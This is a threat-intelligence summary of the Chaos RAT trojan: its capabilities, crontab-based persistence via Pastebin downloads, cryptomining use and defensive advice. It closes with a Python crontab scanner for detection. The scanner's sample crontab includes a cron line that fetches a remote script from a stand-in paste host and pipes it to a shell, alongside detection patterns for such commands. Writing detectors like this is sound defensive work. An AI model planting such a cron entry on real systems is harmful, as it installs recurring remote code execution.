Golang
RAT
DDoS
Linux
Windows
Trojan
Chaos RAT is a multi-OS remote access trojan (RAT) written in Go that can target Windows and Linux. It allows attackers to execute commands, steal data, and control infected machines. Chaos RAT has been used in cryptocurrency mining campaigns to mine Monero (XMR) on compromised machines.
Chaos RAT is an open-source project, so attackers can modify it and add features. It can execute reverse shells, upload and download files, delete files, take screenshots, access File Explorer, gather OS information, restart or shut down the system, and open URLs. Together, these features give attackers full control over compromised machines.
Distribution
In the attacks we have seen, Chaos RAT is distributed through malicious scripts that modify the /etc/crontab file on Linux systems to establish persistence, downloading the malware every 10 minutes from Pastebin. Additional payloads such as the XMRig miner and competition-killer scripts are also downloaded to maximize resource usage for cryptocurrency mining.
Evolution and Impact
First seen in November 2022, Chaos RAT has been used in more complex attacks against Linux systems. The use of a RAT in cryptocurrency mining operations is an evolution of attack methods, allowing threat actors to keep prolonged access to compromised machines and potentially expand their malicious activities beyond mining.
Update and patch operating systems and software to fix known vulnerabilities.
Implement strict access controls and monitor for unauthorized changes to critical files like /etc/crontab.
Deploy security solutions that can detect and prevent remote access tools.
Educate users about the risks of downloading and executing files from untrusted sources to prevent initial infection vectors.
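One way to act on the /etc/crontab monitoring advice, given the persistence pattern described under Distribution: the following is an added example, not code from the original page or from any vendor. It flags system-crontab entries that fetch and execute remote content. The sample crontab, the host `pastebin.example`, and the names `parse_entries`, `findings` and `PASTE_HOSTS` are constructed for illustration.

```python
import re

# Constructed sample of /etc/crontab content; the last entry imitates the
# pattern described above (fetch from a paste site every 10 minutes).
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || run-parts --report /etc/cron.daily
*/10 * * * * root curl -fsSL https://pastebin.example/raw/PLACEHOLDER | sh
"""

FETCH = re.compile(r"\b(curl|wget)\b", re.I)
URL = re.compile(r"https?://([^/\s]+)", re.I)
PIPE_TO_SHELL = re.compile(r"\|\s*(ba|da|z)?sh\b")
PASTE_HOSTS = ("pastebin.",)  # assumption: extend with hosts relevant to you

def parse_entries(text):
    """Yield (line_no, schedule, user, command) for system-crontab job lines.
    Comments, blank lines and VAR=value lines are skipped; @reboot-style
    shortcuts are not handled in this narrow example."""
    for no, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+\s*=", line):
            continue
        fields = line.split(None, 6)  # 5 time fields, user, command
        if len(fields) == 7:
            yield no, " ".join(fields[:5]), fields[5], fields[6]

def findings(text):
    """Return [(line_no, reasons, command)] for entries worth an analyst's look."""
    out = []
    for no, sched, _user, cmd in parse_entries(text):
        reasons = []
        hosts = [h.lower() for h in URL.findall(cmd)]
        if FETCH.search(cmd) and hosts:
            reasons.append("downloads from remote URL")
        if PIPE_TO_SHELL.search(cmd):
            reasons.append("pipes output to a shell")
        if any(p in h for h in hosts for p in PASTE_HOSTS):
            reasons.append("paste-site host")
        if reasons and sched.split()[0].startswith("*/"):
            reasons.append("short repeating interval")
        if reasons:
            out.append((no, reasons, cmd))
    return out

if __name__ == "__main__":
    for no, reasons, cmd in findings(SAMPLE_CRONTAB):
        print(f"line {no}: {', '.join(reasons)} -> {cmd}")
```

To check a live host, pass the contents of /etc/crontab (and the files under /etc/cron.d) to `findings` in place of the sample.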